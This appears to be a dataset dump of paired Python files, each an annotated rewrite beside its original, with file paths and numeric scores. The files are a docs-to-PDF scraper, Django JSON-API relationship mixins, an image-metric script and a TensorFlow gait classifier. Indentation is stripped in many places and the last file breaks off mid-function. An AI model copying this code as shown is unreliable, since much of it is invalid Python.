if bookmark.indent:
parent = bookmark.pdf_ref
def finish(self):
'''
Wrap-up processing by writing the output file and cleaning-up
'''
if not self.no_exec:
self.write_output()
self.clean_up_files()
def make_unique_filename_ext(self, file_name, ext):
'''
Check a file name and extension for uniqueness and append
a suffix if necessary to make it unique
'''
suffix = 2
tentative_name = file_name
while tentative_name + ext in self.files_to_clean_up:
tentative_name = file_name + str(suffix)
suffix += 1
return tentative_name + ext
def pop_heading(self):
'''
Outdent subsequent bookmarks
'''
self.bookmark_stack.pop()
while self.bookmark_stack and \
(not self.bookmark_stack[-1].indent):
self.bookmark_stack.pop()
def push_heading(self, bookmark_title):
'''
Add a heading and make subsequent bookmarks a child of
this heading
'''
self.bookmark_stack.append(self.Bookmark(bookmark_title))
def write_output(self):
'''
Generate the output file
'''
output_file = open(self.file_name, 'wb')
self.writer.write(output_file)
output_file.close()
def title_to_bookmark_title(title):
    '''
    Extract the bookmark name from a page title: the part before the
    first '|' separator, stripped of surrounding whitespace.

    Bug fix: str.find returns -1 (truthy) when '|' is absent, so the
    original `if not vertical_bar` fell through and chopped the last two
    characters off separator-less titles; `[:vertical_bar - 1]` also
    dropped one character too many before the bar.
    '''
    vertical_bar = title.find('|')
    if vertical_bar == -1:
        return title
    return title[:vertical_bar].strip()
def read_page(url):
'''
Read page at URL
'''
response = requests.get(url)
response.raise_for_status()
return bs(response.text, PARSER)
def url_to_absolute(site_url, page_url):
'''
Resolve page URL to absolute URL if relative
'''
return urljoin(site_url, page_url)
def scrape_side_menu_item(site_url, item, output):
'''
Scrape a chapter with sub-chapters, represented by an expandable
side menu item
Iterate through the chapters in the item, or save the item if
there are no sub-items
'''
if 'devsite-nav-item-section-expandable' in item['class']:
nav_text = item.find('span')
output.push_heading(nav_text.text.strip())
for subitem in item.find('ul').find_all('li', recursive=False):
scrape_side_menu_item(site_url, subitem, output)
output.pop_heading()
return
a_tag = item.find('a')
output.add_page(url_to_absolute(site_url, a_tag['href']), \
a_tag.text.strip())
def scrape_upper_tab(site_url, tab, output):
'''
Scrape a major section, represented by an upper tab
Iterate through the chapters in the side menu, or save the upper
tab page if there is no side menu. Side menu items may be nested
'''
a_tag = tab.find('a')
tab_url = a_tag['href']
page = read_page(url_to_absolute(site_url, tab_url))
tag = page.select_one('nav.devsite-section-nav')
if tag:
side_menu = tag.select_one('ul.devsite-nav-list')
else:
side_menu = None
if side_menu:
output.push_heading(a_tag.text.strip())
for item in side_menu.find_all('li', recursive=False):
scrape_side_menu_item(site_url, item, output)
output.pop_heading()
return
output.add_page(url_to_absolute(site_url, tab_url), \
title_to_bookmark_title(page.title.string))
def scrape_site(url, output):
'''
Scrape the site
Save the site main page, then iterate through all the upper tabs
'''
page = read_page(url)
output.push_heading(page.title.string.strip())
output.add_page(url, url, bookmark=False)
for tag in page.select('div.devsite-header-upper-tabs'):
for tab in tag.find_all('li'):
scrape_upper_tab(url, tab, output)
output.pop_heading()
def parse_command_line():
'''
Parse the command line and save options
'''
parser = argparse.ArgumentParser('Scrape an android.com site to PDF')
parser.add_argument('url', type=str, metavar='URL')
parser.add_argument('-o', '--output', type=str, metavar='OUTPUT', \
default='scraper.pdf', help='output file name')
parser.add_argument('--delay', type=int, default=1, \
metavar='DELAY', help='delay in seconds between requests')
parser.add_argument('-N', '--no-exec', action='store_true', \
help="don't execute, just show what would be done")
return parser.parse_args()
def main():
'''
Parse arguments and perform scraping
'''
try:
args = parse_command_line()
output = PdfOutput(args.output, no_exec=args.no_exec, delay=args.delay)
# developer.android.com causes "too many open files" error
resource.setrlimit(resource.RLIMIT_NOFILE, (10000, 10000))
scrape_site(args.url, output)
output.finish()
print('Done')
except KeyboardInterrupt:
print('Cancelled')
main() | 0.449151 | 0.112137 |
from django.db import transaction
from rest_framework import status
from rest_framework.response import Response
from json_api.exceptions import MethodNotAllowed
class RetrieveRelationshipMixin(object):
    """Mixin providing the GET handler for a resource's relationship
    endpoint."""

    def retrieve_relationship(self, request, pk, relname, *args, **kwargs):
        """Return the relationship object for *relname*, including
        linkage data."""
        relationship = self.get_relationship(relname)
        obj = self.get_object()
        payload = self.build_relationship_object(
            relationship, obj, include_linkage=True)
        return Response(payload)
class ManageRelationshipMixin(object):
    """Mixin providing the write handlers (POST/PATCH/DELETE) for a
    resource's relationship endpoints, plus their transactional helpers."""
    def create_relationship(self, request, pk, relname, *args, **kwargs):
        # POST adds linkage; only meaningful for to-many relationships.
        rel = self.get_relationship(relname)
        if not rel.info.to_many:
            raise MethodNotAllowed(request.method)
        data = self.get_data(request.data)
        self.perform_relationship_create(rel, data)
        return Response(status=status.HTTP_204_NO_CONTENT)
    def update_relationship(self, request, pk, relname, *args, **kwargs):
        # PATCH replaces the linkage entirely (to-one and to-many alike).
        rel = self.get_relationship(relname)
        data = self.get_data(request.data)
        self.perform_relationship_update(rel, data)
        return Response(status=status.HTTP_204_NO_CONTENT)
    def destroy_relationship(self, request, pk, relname, *args, **kwargs):
        # DELETE removes linkage; only meaningful for to-many relationships.
        rel = self.get_relationship(relname)
        if not rel.info.to_many:
            raise MethodNotAllowed(request.method)
        data = self.get_data(request.data)
        self.perform_relationship_destroy(rel, data)
        return Response(status=status.HTTP_204_NO_CONTENT)
    @transaction.atomic
    def perform_relationship_create(self, rel, data):
        # Runs inside a DB transaction so partial links are rolled back.
        instance = self.get_object()
        related = self.get_related_from_data(rel, data)
        self.link_related(rel, instance, related)
    @transaction.atomic
    def perform_relationship_update(self, rel, data):
        instance = self.get_object()
        related = self.get_related_from_data(rel, data)
        self.set_related(rel, instance, related)
        # Only to-one relationships need to be saved: the FK column lives
        # on the related row for reverse relations, else on this instance.
        if not rel.info.to_many:
            if rel.attname in self.model_info.reverse_relations:
                related.save()
            else:
                instance.save()
    @transaction.atomic
    def perform_relationship_destroy(self, rel, data):
        instance = self.get_object()
        related = self.get_related_from_data(rel, data)
        self.unlink_related(rel, instance, related)
self.unlink_related(rel, instance, related) | json_api/mixins/relationships.py | from django.db import transaction
from rest_framework import status
from rest_framework.response import Response
from json_api.exceptions import MethodNotAllowed
class RetrieveRelationshipMixin(object):
def retrieve_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
instance = self.get_object()
response_data = self.build_relationship_object(rel, instance, include_linkage=True)
return Response(response_data)
class ManageRelationshipMixin(object):
def create_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
if not rel.info.to_many:
raise MethodNotAllowed(request.method)
data = self.get_data(request.data)
self.perform_relationship_create(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
def update_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
data = self.get_data(request.data)
self.perform_relationship_update(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
def destroy_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
if not rel.info.to_many:
raise MethodNotAllowed(request.method)
data = self.get_data(request.data)
self.perform_relationship_destroy(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
@transaction.atomic
def perform_relationship_create(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.link_related(rel, instance, related)
@transaction.atomic
def perform_relationship_update(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.set_related(rel, instance, related)
# Only to-one relationships need to be saved
if not rel.info.to_many:
if rel.attname in self.model_info.reverse_relations:
related.save()
else:
instance.save()
@transaction.atomic
def perform_relationship_destroy(self, rel, data):
instance = self.get_object()
related = self.get_related_from_data(rel, data)
self.unlink_related(rel, instance, related) | 0.588416 | 0.089097 |
import gpu_util
import os
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_util.pick_gpu_lowest_memory())
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot
import sys
import skimage.measure
import numpy
import numpy as np
import skimage.io
from skimage.morphology import disk, dilation
import skimage.feature
import skimage.metrics
def compute_metric(dir1, dir2, mode, mask=None, thre=0):
    """Compute an image metric ('ssim', 'psnr' or 'perceptual_tf') between
    the name-sorted, positionally paired images of dir1 and dir2.

    Writes <mode>.txt (mean), <mode>_all.txt (per image) and, for
    30-image sets, <mode>_breakdown.txt into dir1; returns the per-image
    values. mask and thre are currently unused.
    """
    if mode == 'perceptual_tf':
        # Lazily import LPIPS + TF and build the distance graph only when
        # the perceptual metric is requested.
        sys.path += ['lpips-tensorflow']
        import lpips_tf
        import tensorflow as tf
        image0_ph = tf.placeholder(tf.float32, [1, None, None, 3])
        image1_ph = tf.placeholder(tf.float32, [1, None, None, 3])
        distance_t = lpips_tf.lpips(image0_ph, image1_ph, model='net-lin', net='alex')
        sess = tf.Session()
    files1 = os.listdir(dir1)
    files2 = os.listdir(dir2)
    img_files1 = sorted([file for file in files1 if file.endswith('.png') or file.endswith('.jpg')])
    img_files2 = sorted([file for file in files2 if file.endswith('.png') or file.endswith('.jpg')])
    # Optional --prefix CLI flag restricts dir2 to matching file names.
    if '--prefix' in sys.argv:
        prefix_idx = sys.argv.index('--prefix')
        prefix = sys.argv[prefix_idx+1]
        img_files2 = [file for file in img_files2 if file.startswith(prefix)]
    skip_last_n = 0
    img_files2 = img_files2
    # Images are paired positionally after sorting.
    assert len(img_files1) == len(img_files2)
    vals = numpy.empty(len(img_files1))
    for ind in range(len(img_files1)):
        if mode in ['ssim', 'psnr']:
            img1 = skimage.img_as_float(skimage.io.imread(os.path.join(dir1, img_files1[ind])))
            img2 = skimage.img_as_float(skimage.io.imread(os.path.join(dir2, img_files2[ind])))
            if mode == 'ssim':
                # NOTE(review): 'datarange' looks like a typo for
                # 'data_range'; as written it is at best ignored --
                # confirm against the installed skimage version.
                metric_val = skimage.measure.compare_ssim(img1, img2, datarange=img2.max()-img2.min(), multichannel=True)
            elif mode == 'psnr':
                metric_val = skimage.metrics.peak_signal_noise_ratio(img2, img1)
        elif mode == 'perceptual_tf':
            img1 = np.expand_dims(skimage.img_as_float(skimage.io.imread(os.path.join(dir1, img_files1[ind]))), axis=0)
            img2 = np.expand_dims(skimage.img_as_float(skimage.io.imread(os.path.join(dir2, img_files2[ind]))), axis=0)
            metric_val = sess.run(distance_t, feed_dict={image0_ph: img1, image1_ph: img2})
        else:
            # Unknown mode: bare raise with no active exception -> RuntimeError.
            raise
        vals[ind] = numpy.mean(metric_val)
    filename_all = mode + '_all.txt'
    filename_breakdown = mode + '_breakdown.txt'
    filename_single = mode + '.txt'
    numpy.savetxt(os.path.join(dir1, filename_all), vals, fmt="%f, ")
    target=open(os.path.join(dir1, filename_single),'w')
    target.write("%f"%numpy.mean(vals))
    target.close()
    # Hard-coded 5/5/20 breakdown for the 30-image evaluation set.
    if len(img_files1) == 30:
        target=open(os.path.join(dir1, filename_breakdown),'w')
        target.write("%f, %f, %f"%(numpy.mean(vals[:5]), numpy.mean(vals[5:10]), numpy.mean(vals[10:])))
        target.close()
    if mode == 'perceptual_tf':
        sess.close()
    return vals
def get_score(name):
    """Compute image metrics between directory *name* and sys.argv[2].

    sys.argv[3] optionally selects a single mode; 'all' (or absent)
    runs every mode.
    """
    dirs = sorted(os.listdir(name))
    mode = None
    if len(sys.argv) > 3 and sys.argv[3] != 'all':
        mode = sys.argv[3]
    all_modes = ['ssim', 'perceptual_tf', 'psnr']
    if mode is None:
        print('running all mode', mode)
        for m in all_modes:
            compute_metric(name, sys.argv[2], m)
        return
    assert mode in all_modes
    print('running mode', mode)
    compute_metric(name, sys.argv[2], mode)
if __name__ == '__main__':
get_score(sys.argv[1]) | metric_evaluation.py | import gpu_util
import os
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_util.pick_gpu_lowest_memory())
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot
import sys
import skimage.measure
import numpy
import numpy as np
import skimage.io
from skimage.morphology import disk, dilation
import skimage.feature
import skimage.metrics
def compute_metric(dir1, dir2, mode, mask=None, thre=0):
if mode == 'perceptual_tf':
sys.path += ['lpips-tensorflow']
import lpips_tf
import tensorflow as tf
image0_ph = tf.placeholder(tf.float32, [1, None, None, 3])
image1_ph = tf.placeholder(tf.float32, [1, None, None, 3])
distance_t = lpips_tf.lpips(image0_ph, image1_ph, model='net-lin', net='alex')
sess = tf.Session()
files1 = os.listdir(dir1)
files2 = os.listdir(dir2)
img_files1 = sorted([file for file in files1 if file.endswith('.png') or file.endswith('.jpg')])
img_files2 = sorted([file for file in files2 if file.endswith('.png') or file.endswith('.jpg')])
if '--prefix' in sys.argv:
prefix_idx = sys.argv.index('--prefix')
prefix = sys.argv[prefix_idx+1]
img_files2 = [file for file in img_files2 if file.startswith(prefix)]
skip_last_n = 0
img_files2 = img_files2
assert len(img_files1) == len(img_files2)
vals = numpy.empty(len(img_files1))
for ind in range(len(img_files1)):
if mode in ['ssim', 'psnr']:
img1 = skimage.img_as_float(skimage.io.imread(os.path.join(dir1, img_files1[ind])))
img2 = skimage.img_as_float(skimage.io.imread(os.path.join(dir2, img_files2[ind])))
if mode == 'ssim':
metric_val = skimage.measure.compare_ssim(img1, img2, datarange=img2.max()-img2.min(), multichannel=True)
elif mode == 'psnr':
metric_val = skimage.metrics.peak_signal_noise_ratio(img2, img1)
elif mode == 'perceptual_tf':
img1 = np.expand_dims(skimage.img_as_float(skimage.io.imread(os.path.join(dir1, img_files1[ind]))), axis=0)
img2 = np.expand_dims(skimage.img_as_float(skimage.io.imread(os.path.join(dir2, img_files2[ind]))), axis=0)
metric_val = sess.run(distance_t, feed_dict={image0_ph: img1, image1_ph: img2})
else:
raise
vals[ind] = numpy.mean(metric_val)
filename_all = mode + '_all.txt'
filename_breakdown = mode + '_breakdown.txt'
filename_single = mode + '.txt'
numpy.savetxt(os.path.join(dir1, filename_all), vals, fmt="%f, ")
target=open(os.path.join(dir1, filename_single),'w')
target.write("%f"%numpy.mean(vals))
target.close()
if len(img_files1) == 30:
target=open(os.path.join(dir1, filename_breakdown),'w')
target.write("%f, %f, %f"%(numpy.mean(vals[:5]), numpy.mean(vals[5:10]), numpy.mean(vals[10:])))
target.close()
if mode == 'perceptual_tf':
sess.close()
return vals
def get_score(name):
dirs = sorted(os.listdir(name))
if len(sys.argv) > 3:
mode = sys.argv[3]
if mode == 'all':
mode = None
else:
mode = None
all_modes = ['ssim', 'perceptual_tf', 'psnr']
if mode is None:
print('running all mode', mode)
for m in all_modes:
compute_metric(name, sys.argv[2], m)
else:
assert mode in all_modes
print('running mode', mode)
compute_metric(name, sys.argv[2], mode)
if __name__ == '__main__':
get_score(sys.argv[1]) | 0.201577 | 0.288663 |
import numpy as np
import tensorflow as tf
import bidirectional_autoencoder as bd
import data_utils as du
# 5719 total samples
# 5147 training samples
# 321 batches of size 16
# 10 epochs more or less
#STEPS = 3250
STEPS = 10000
#batch_size = bd.batch_size
starting_learning_rate = 1e-2
decay_rate = 5e-1
decay_steps = 1000
"""
Build the data iterators for training and testing.
For more information about data iterators and tf input
pipelines, please refer to the official tf documentation
(https://www.tensorflow.org/versions/r0.12/api_docs/python/io_ops/input_pipeline)
"""
def build_iterators():
    """
    Build the data iterators for training and testing over the
    classifier dataset (90%/10% split).

    Returns (train_data_iterator, train_target_iterator,
    test_data_iterator, test_target_iterator).
    """
    dataset = np.load(du.classifier_ds_fname)
    labels = np.load(du.classifier_l_fname)
    data_split = int(len(dataset) * 0.9)
    label_split = int(len(labels) * 0.9)
    train_data = dataset[:data_split]
    test_data = dataset[data_split:]
    train_labels = labels[:label_split]
    test_labels = labels[label_split:]
    train_ds = tf.data.Dataset.from_tensor_slices(
        tf.cast(train_data, dtype=tf.float32)).batch(bd.batch_size)
    train_tgt = tf.data.Dataset.from_tensor_slices(
        tf.cast(train_labels, dtype=tf.int32)).batch(bd.batch_size)
    # The test set is batched as one big batch purely for convenience;
    # otherwise batch_size would have to become a placeholder switched
    # between training and testing.
    test_ds = tf.data.Dataset.from_tensor_slices(
        tf.cast(test_data, dtype=tf.float32)).batch(len(test_data))
    test_tgt = tf.data.Dataset.from_tensor_slices(
        tf.cast(test_labels, dtype=tf.int32)).batch(len(test_data))
    return (train_ds.make_initializable_iterator(),
            train_tgt.make_initializable_iterator(),
            test_ds.make_initializable_iterator(),
            test_tgt.make_initializable_iterator())
"""
The final state of the autoencoder must be unpacked and reshaped.
Here we do this.
"""
def reshape_state(state, num_units, batch_size):
    """Unpack the bidirectional LSTM final state (2 directions x 2 layers
    x (c, h) pairs) and repack it as a (batch_size, h, w, 8) image-like
    tensor, where h and w are powers of two derived from num_units.
    """
    log_dimension = np.log2(num_units)
    # Split num_units into a near-square power-of-two grid (h = 2 * w).
    h = int(2**(np.floor(log_dimension/2)+1))
    w = int(2**np.floor(log_dimension/2))
    # Unpack the output state of the bidirectional LSTM blocks.
    # After these operations s_[f|b]w_i_j has shape
    # (batch_size, num_units)
    s_fw, s_bw = tf.unstack(state)
    s_fw_1, s_fw_2 = tf.unstack(s_fw)
    s_fw_1_1, s_fw_1_2 = tf.unstack(s_fw_1)
    s_fw_2_1, s_fw_2_2 = tf.unstack(s_fw_2)
    s_bw_1, s_bw_2 = tf.unstack(s_bw)
    s_bw_1_1, s_bw_1_2 = tf.unstack(s_bw_1)
    s_bw_2_1, s_bw_2_2 = tf.unstack(s_bw_2)
    # Order matters: forward states first, then backward, layer by layer.
    state_list = [s_fw_1_1,
                  s_fw_1_2,
                  s_fw_2_1,
                  s_fw_2_2,
                  s_bw_1_1,
                  s_bw_1_2,
                  s_bw_2_1,
                  s_bw_2_2]
    # Now it is time to repack the tensors in a
    # (batch_size, height, width, depth) shape
    # Namely, (16, 32, 16, 8)
    reshaped_state_list = [tf.reshape(x, [batch_size,h,w,1])
                           for x in state_list]
    s_full = tf.stack(reshaped_state_list,3)
    s_full = tf.squeeze(s_full, 4)
    #s_full = tf.reshape(s_full, [batch_size, h, w, 8])
    return s_full
"""
Here the convolutional architecture is defined.
The filters must be a tf variable. We initialize their weights by means
of truncated normal distribution with 0 mean and standard deviation std=5e-2.
We have one convolutional layer with [10, 6, 8, 16] filters, and a max pooling
operation with kernel size ksize = [1, 4, 4, 1], and strides = [1, 2, 2, 1]
"""
def build_conv_layers(in_tensor):
    """Single convolutional layer ([10, 6, 8, 16] filters, stride 2,
    truncated-normal init with std 5e-2) followed by a 4x4 max pool
    with stride 2."""
    # Variable name 'filter' is kept for checkpoint compatibility.
    kernel = tf.get_variable(
        'filter',
        [10, 6, 8, 16],
        initializer=tf.truncated_normal_initializer(stddev=5e-2,
                                                    dtype=tf.float32),
        dtype=tf.float32)
    conv = tf.nn.conv2d(input=in_tensor,
                        filter=kernel,
                        strides=[1, 2, 2, 1],
                        padding='SAME',
                        name='cv_1')
    return tf.nn.max_pool(value=conv,
                          ksize=[1, 4, 4, 1],
                          strides=[1, 2, 2, 1],
                          padding='SAME',
                          name='pool_1')
"""
Add a RELU activation function
"""
def add_relu_activation(in_tensor):
return tf.nn.relu(features = in_tensor, name = 'relu')
"""
Flatten the output
"""
def add_dropout(in_tensor, keep_prob):
return tf.nn.dropout(x = in_tensor,
keep_prob = keep_prob,
name = 'conv_dropout')
def flatten_layer(in_tensor):
# This layer flattens in_tensor so that it can be
# fed to the output layer.
# in_tensor must have shape [batch_size, whatever]
flat_output = tf.contrib.layers.flatten(in_tensor)
return flat_output
"""
Run this to train the classifier. The trained model will be saved in
"./checkpoint/classification/model"
"""
def build_output_layer(in_tensor):
logits = tf.layers.dense(inputs = in_tensor,
units = 2,
activation = None,
name = 'logits')
return logits
def build_loss(in_tensor, labels):
loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels = labels,
logits = in_tensor,
name = 'xent'))
return loss
def training_step(loss, global_step):
learning_rate = tf.train.exponential_decay(starting_learning_rate,
global_step = global_step,
decay_steps = decay_steps,
decay_rate = decay_rate,
staircase=True)
opt = tf.train.GradientDescentOptimizer(learning_rate)
opt_op = opt.minimize(loss)
return opt_op
"""
Run this to train the classifier. The trained model will be saved in
"./checkpoint/classification/model"
"""
if __name__ == '__main__':
conv_train_graph = tf.Graph()
data = np.load(du.np_data_fname)
data = data[:int(len(data)*0.9)]
with conv_train_graph.as_default():
data_handle = tf.placeholder(tf.string, shape = [], name = 'data_handle')
target_handle = tf.placeholder(tf.string, shape = [], name = 'labels_handle')
data_iterator = tf.data.Iterator.from_string_handle(data_handle,
output_types = tf.float32,
output_shapes = [None, du.STEPS, du.FEATURES])
target_iterator = tf.data.Iterator.from_string_handle(target_handle,
output_types = tf.int32,
output_shapes = [None, 2])
train_data_iterator, train_target_iterator, \
test_data_iterator, test_target_iterator = build_iterators()
sequence = data_iterator.get_next()
labels = target_iterator.get_next()
keep_prob = tf.placeholder_with_default(1.0, shape=(),
name = 'keep_prob_ph')
fw_cell = bd.build_fw_cell(keep_prob = keep_prob)
bw_cell = bd.build_bw_cell(keep_prob = keep_prob)
output, state = bd.build_rnn_autoencoder(
fw_cell = fw_cell,
bw_cell = bw_cell,
input_sequence = sequence,
sequence_lengths = du.STEPS)
# concatenate output_fw and output_bw
output = tf.concat(output, 2)
# Here I obtain the predictions from the autoencoder
predictions = bd.build_output_layer(source = output,
output_dim = 9)
# Reshape the final state of the autoencoder so that
# shape is: [batch_size, height, width, channels]
batch_size = tf.placeholder_with_default(bd.batch_size,
shape=(), name = 'batch_size')
s_full = reshape_state(state, bd.num_units, batch_size)
restore_rnn = tf.train.Saver()
conv_keep_prob = tf.placeholder(shape = (), dtype = tf.float32,
name = 'kp_conv_ph')
global_step = tf.Variable(0, trainable=False)
pooling_output = build_conv_layers(s_full)
relu = add_relu_activation(pooling_output)
flat_output = flatten_layer(relu)
do_output = add_dropout(flat_output, conv_keep_prob)
logits = build_output_layer(do_output)
loss = build_loss(logits, labels)
update_step = training_step(loss, global_step)
tf.summary.scalar('loss', loss)
init = tf.global_variables_initializer()
merged_summary = tf.summary.merge_all()
train_saver = tf.train.Saver()
sess = tf.Session(graph = conv_train_graph)
sess.run(init)
train_data_handle, train_target_handle = sess.run([
train_data_iterator.string_handle(),
train_target_iterator.string_handle()])
test_data_handle, test_target_handle = sess.run([
test_data_iterator.string_handle(),
test_target_iterator.string_handle()])
sess.run([train_data_iterator.initializer,
train_target_iterator.initializer,
test_data_iterator.initializer,
test_target_iterator.initializer])
restore_rnn.restore(sess, './checkpoint/model')
writer_1 = tf.summary.FileWriter('./checkpoint/classification/train/', conv_train_graph)
writer_2 = tf.summary.FileWriter('./checkpoint/classification/eval/', conv_train_graph)
for train_step in range(STEPS):
if train_step%320!=0 or train_step==0:
s, l, _ = sess.run([merged_summary, loss, update_step],
feed_dict = {data_handle: train_data_handle,
target_handle: train_target_handle, conv_keep_prob: 0.5})
else:
sess.run(train_data_iterator.initializer)
sess.run(train_target_iterator.initializer)
s, l, _ = sess.run([merged_summary, loss, update_step],
feed_dict = {data_handle: train_data_handle,
target_handle: train_target_handle, conv_keep_prob: 0.5})
if train_step%100 == 0:
writer_1.add_summary(s, train_step)
print('Step -> %d\tLoss -> %f' % (train_step, l))
sess.run([test_data_iterator.initializer,
test_target_iterator.initializer])
s, eval_loss = sess.run([merged_summary, loss],
feed_dict = {data_handle: test_data_handle,
target_handle: test_target_handle,
batch_size: 572,
conv_keep_prob: 1.0})
writer_2.add_summary(s, train_step)
print('Eval Loss -> %f' % eval_loss)
if train_step%500==0:
train_saver.save(sess,
'./checkpoint/classification/model',
global_step = train_step+1)
train_saver.save(sess,
'./checkpoint/classification/model')
writer_1.close()
writer_2.close() | Seq2Seq-gait-analysis/conv_classifier_eval.py | import numpy as np
import tensorflow as tf
import bidirectional_autoencoder as bd
import data_utils as du
# 5719 total samples
# 5147 training samples
# 321 batches of size 16
# 10 epochs more or less
#STEPS = 3250
STEPS = 10000
#batch_size = bd.batch_size
starting_learning_rate = 1e-2
decay_rate = 5e-1
decay_steps = 1000
"""
Build the data iterators for training and testing.
For more information about data iterators and tf input
pipelines, please refer to the official tf documentation
(https://www.tensorflow.org/versions/r0.12/api_docs/python/io_ops/input_pipeline)
"""
def build_iterators():
    """Build initializable tf.data iterators for classifier training/eval.

    Loads the classifier dataset and label arrays from the paths declared
    in ``data_utils`` and splits both 90% train / 10% test.

    Returns:
        Tuple of four initializable iterators:
        (train_data_iterator, train_target_iterator,
         test_data_iterator, test_target_iterator).
        Train iterators are batched with ``bd.batch_size``; test iterators
        hold the whole test split in a single batch.
    """
    # split 90% train, 10% test
    dataset = np.load(du.classifier_ds_fname)
    labels = np.load(du.classifier_l_fname)
    train_data = dataset[:int(len(dataset)*0.9)]
    train_labels = labels[:int(len(labels)*0.9)]
    test_data = dataset[int(len(dataset)*0.9):]
    test_labels = labels[int(len(labels)*0.9):]
    # Wrap the numpy splits in tf.data Datasets, casting to the dtypes the
    # graph expects (float32 features, int32 one-hot labels).
    train_dataset = tf.data.Dataset.from_tensor_slices(tf.cast(train_data,
                                                               dtype = tf.float32))
    test_dataset = tf.data.Dataset.from_tensor_slices(tf.cast(test_data,
                                                              dtype = tf.float32))
    train_target = tf.data.Dataset.from_tensor_slices(tf.cast(train_labels,
                                                              dtype = tf.int32))
    test_target = tf.data.Dataset.from_tensor_slices(tf.cast(test_labels,
                                                             dtype = tf.int32))
    train_dataset = train_dataset.batch(bd.batch_size)
    train_target = train_target.batch(bd.batch_size)
    # I batch the test just for convenience, otherwise I should define the
    # batch_size as a placeholder and change it according to whether I'm in
    # training or testing.
    test_dataset = test_dataset.batch(len(test_data))
    test_target = test_target.batch(len(test_data))
    train_data_iterator = train_dataset.make_initializable_iterator()
    train_target_iterator = train_target.make_initializable_iterator()
    test_data_iterator = test_dataset.make_initializable_iterator()
    test_target_iterator = test_target.make_initializable_iterator()
    return (train_data_iterator,
            train_target_iterator,
            test_data_iterator,
            test_target_iterator)
"""
The final state of the autoencoder must be unpacked and reshaped.
Here we do this.
"""
def reshape_state(state, num_units, batch_size):
    """Repack the bidirectional LSTM final state as a 4-D image-like tensor.

    Args:
        state: nested final state of the 2-layer bidirectional LSTM; it
            unstacks into 8 tensors, each of shape (batch_size, num_units).
        num_units: LSTM state size; determines the spatial dims h and w.
        batch_size: leading dimension of the result (int or scalar tensor).

    Returns:
        Tensor of shape (batch_size, h, w, 8), where h*w factorizes
        num_units into two powers of two (e.g. 32x16 for num_units=512).
        # NOTE(review): h*w == num_units only when log2(num_units) is odd
        # -- confirm the num_units used by the autoencoder.
    """
    log_dimension = np.log2(num_units)
    # Near-square power-of-two spatial dims; h gets the larger exponent.
    h = int(2**(np.floor(log_dimension/2)+1))
    w = int(2**np.floor(log_dimension/2))
    # Manual unpacking of the output state of the bidirectional LSTM
    # blocks. After these operations s_[f|b]w_i_j has shape
    # (batch_size, num_units).
    s_fw, s_bw = tf.unstack(state)
    s_fw_1, s_fw_2 = tf.unstack(s_fw)
    s_fw_1_1, s_fw_1_2 = tf.unstack(s_fw_1)
    s_fw_2_1, s_fw_2_2 = tf.unstack(s_fw_2)
    s_bw_1, s_bw_2 = tf.unstack(s_bw)
    s_bw_1_1, s_bw_1_2 = tf.unstack(s_bw_1)
    s_bw_2_1, s_bw_2_2 = tf.unstack(s_bw_2)
    state_list = [s_fw_1_1,
                  s_fw_1_2,
                  s_fw_2_1,
                  s_fw_2_2,
                  s_bw_1_1,
                  s_bw_1_2,
                  s_bw_2_1,
                  s_bw_2_2]
    # Now it is time to repack the tensors in a
    # (batch_size, height, width, depth) shape
    # Namely, (16, 32, 16, 8)
    reshaped_state_list = [tf.reshape(x, [batch_size,h,w,1])
                           for x in state_list]
    # Stack along a new axis 3, then drop the singleton channel axis,
    # leaving depth 8.
    s_full = tf.stack(reshaped_state_list,3)
    s_full = tf.squeeze(s_full, 4)
    #s_full = tf.reshape(s_full, [batch_size, h, w, 8])
    return s_full
"""
Here the convolutional architecture is defined.
The filters must be a tf variable. We initialize their weights by means
of truncated normal distribution with 0 mean and standard deviation std=5e-2.
We have one convolutional layer with [10, 6, 8, 16] filters, and a max pooling
operation with kernel size ksize = [1, 4, 4, 1], and strides = [1, 2, 2, 1]
"""
def build_conv_layers(in_tensor):
    """Single conv + max-pool block applied to the reshaped LSTM state.

    Args:
        in_tensor: 4-D tensor (batch, h, w, 8) from reshape_state.

    Returns:
        Pooled feature map with 16 channels; conv and pool both use
        stride 2 with SAME padding, so spatial dims shrink ~4x overall.
    """
    # 10x6 kernels, 8 input channels -> 16 output channels, weights drawn
    # from a truncated normal with mean 0 and std 5e-2.
    filters = tf.get_variable('filter',
                              [10, 6, 8, 16],
                              initializer=tf.truncated_normal_initializer(stddev=5e-2, dtype=tf.float32),
                              dtype=tf.float32)
    x_1 = tf.nn.conv2d(input = in_tensor,
                       filter = filters,
                       strides = [1, 2, 2, 1],
                       padding = 'SAME',
                       name = 'cv_1')
    pool_1 = tf.nn.max_pool(value = x_1,
                            ksize = [1, 4, 4, 1],
                            strides = [1, 2, 2, 1],
                            padding = 'SAME',
                            name = 'pool_1')
    return pool_1
"""
Add a RELU activation function
"""
def add_relu_activation(in_tensor):
    """Apply an elementwise ReLU (op name 'relu') to in_tensor."""
    activated = tf.nn.relu(features = in_tensor, name = 'relu')
    return activated
"""
Flatten the output
"""
def add_dropout(in_tensor, keep_prob):
    """Apply dropout with the given keep probability (op 'conv_dropout')."""
    dropped = tf.nn.dropout(x = in_tensor,
                            keep_prob = keep_prob,
                            name = 'conv_dropout')
    return dropped
def flatten_layer(in_tensor):
    """Flatten in_tensor to [batch_size, -1] so it can feed a dense layer."""
    return tf.contrib.layers.flatten(in_tensor)
"""
Run this to train the classifier. The trained model will be saved in
"./checkpoint/classification/model"
"""
def build_output_layer(in_tensor):
    """Dense layer producing the 2-class logits (no activation, name 'logits')."""
    return tf.layers.dense(inputs = in_tensor,
                           units = 2,
                           activation = None,
                           name = 'logits')
def build_loss(in_tensor, labels):
